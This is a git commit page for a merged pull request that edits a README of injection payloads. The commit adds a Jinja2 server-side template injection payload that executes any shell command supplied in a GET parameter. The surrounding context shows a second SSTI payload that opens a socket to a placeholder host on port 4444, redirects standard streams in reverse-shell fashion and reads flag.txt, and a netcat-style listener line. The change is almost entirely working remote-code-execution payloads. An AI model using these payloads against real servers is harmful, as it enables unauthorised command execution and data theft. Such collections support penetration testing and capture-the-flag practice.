Merge pull request #163 from SecGus/master

Improvement to the SSTI RCE
2025-02-20 13:46:05 +00:00 · 2020-03-09 20:06:32 +01:00 · 2020-03-09 20:06:32 +01:00 · c20f84d09c
commit c20f84d09c
parent 1f3a94ba88 fe4bdb0df4
1 changed files with 7 additions and 0 deletions
--- a/Injection/README.md
+++ b/Injection/README.md
@ -314,6 +314,13 @@ nv -lnvp 8000
 {% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen("python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"ip\",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/cat\", \"flag.txt\"]);'").read().zfill(417)}}{%endif%}{% endfor %}
 ```

+Simply modification of payload to clean up output and facilitate command input (https://twitter.com/SecGus/status/1198976764351066113)
+In another GET parameter include a variable named "input" that contains the command you want to run (For example: &input=ls)
+
+```python
+{% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen(request.args.input).read()}}{%endif%}{%endfor%}
+```
+
 #### Exploit the SSTI by writing an evil config file.

 ```python